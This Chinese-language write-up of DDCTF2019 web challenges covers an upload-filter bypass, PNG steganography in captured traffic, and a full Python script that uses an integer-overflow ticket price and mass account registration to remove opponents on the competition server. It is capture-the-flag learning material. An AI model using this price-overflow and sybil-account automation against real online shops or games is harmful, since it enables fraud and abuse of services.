DDCTF2019 web-writeup（2）

3 upload-IMG

上传照片之后发现提示需要包含phpinfo
写入phpinfo再次上传发现还是提示需要包含
发现它上传后网页会显示上传的照片
尝试下载后打开，和上传的图片比对后发现phpinfo被过滤了

猜测是二次过滤

4 大吉大利今晚吃鸡

题目提示要购买入门券并淘汰对手
购买提示余额不足
抓包更改金额小于2000的提示券的金额必须是2000
大于2000的即可更改成功
猜测是整数溢出

抓包更改金额，购买成功

进入游戏页面之后，可以看到用户的id和ticket值
点击移除对手需要输入id和ticket值
随便尝试注册一个用户获得两个值输入发现剩余对手-1
总共要移除100个对手
构造脚本

#coded by 某大佬
import requests

users = {}

def regist(name,pwd='aaaaaaaa'):
    url = 'http://117.51.147.155:5050/ctf/api/register?name=%s&password=%s'%(name,pwd)
    r = requests.get(url=url)
    cookies = r.cookies.get_dict()
    # cookies = requests.utils.dict_from_cookiejar(r.cookies)
    users[cookies['user_name']] = cookies['REVEL_SESSION']
    return cookies['user_name'],cookies['REVEL_SESSION']

def buyticket(name,session):
    url = 'http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4611686018427387904'
    header={'Cookie':'user_name=%s; REVEL_SESSION=%s'%(name,session),'Referer': 'http://117.51.147.155:5050/index.html'}
    r = requests.get(url=url,headers=header)

    bill_id = eval(r.text)['data'][0]['bill_id']#,requests.utils.dict_from_cookiejar(r.cookies)
    payticket(bill_id,name,session)

def payticket(bill_id,name,session):
    url = 'http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=%s'%(bill_id)
    header={'Cookie':'user_name=%s; REVEL_SESSION=%s'%(name,session),'Referer': 'http://117.51.147.155:5050/index.html'}
    r = requests.get(url=url,headers=header)
    myid = eval(r.text)["data"][0]["your_id"]
    ticket = eval(r.text)["data"][0]["your_ticket"]
    getflag(myid,ticket)

def getflag(id,ticket):
    url = 'http://117.51.147.155:5050/ctf/api/remove_robot?id=%s&ticket=%s'%(id,ticket)
    header={'Cookie':'user_name=%s; REVEL_SESSION=%s'.format(adminUser,adminSession),'Referer': 'http://117.51.147.155:5050/index.html'}
    r = requests.get(url=url,headers=header)
    print eval(r.text)

adminUser , adminSession = regist('getMyFlag11')
print adminUser,adminSession #important
buyticket(adminUser,adminSession)

for x in range(200,301):
    regist('newUser%s'%(x))
for n in users:
    if n != adminUser:
        buyticket(n,users[n])

脚本是一个大佬写的 如果不可以转载的话请大佬和我说
感谢大佬～

脚本需要运行多次，因为好像有一些用户注册了之后将会赋予重复id，重复id再被移除一次不算数

查看flag —— 登录脚本注册的adminUser账号
进入http://117.51.147.155:5050/index.html#/main/index

5 流量分析

wireshark打开流量包，导出http分组

下载6420分组的图片

过滤表达式http.request.method == POST
找到分组1782 还有另一张图片
右击-追踪流-http流
要恢复里面post的png图像 - 点击显示和保存转为原始数据 - Save as

删除多余的数据
png图像开头为89 50 4E 47 —— ‰PNG(每个png文件相同）
结束为 49 45 4E 44 ——IEND(每个png文件相同）
还有四个字节 AE 42 60 82 (每个文件不同）
另存为再次打开

这里有个坑点：图片高宽出现问题，如果是linux/mac系统，无法直接打开图片；windows系统可以直接打开

打开是个钥匙的图案 猜测是图片隐写
49 48 44 52 IHDR标识（每个png文件都有）
00 00 06 3E 表示图片的宽 1598像素
00 00 02 18 表示图片长 536像素
更改图片长为00 00 06 3E 获得密码key:gKvN4eEm

导出的http分组中有一个网站http://tools.jb51.net/aideddesign/img_add_info
是图片在线解密，输入图片和密码，得到flag！

希望下次比赛可以拿奖啊！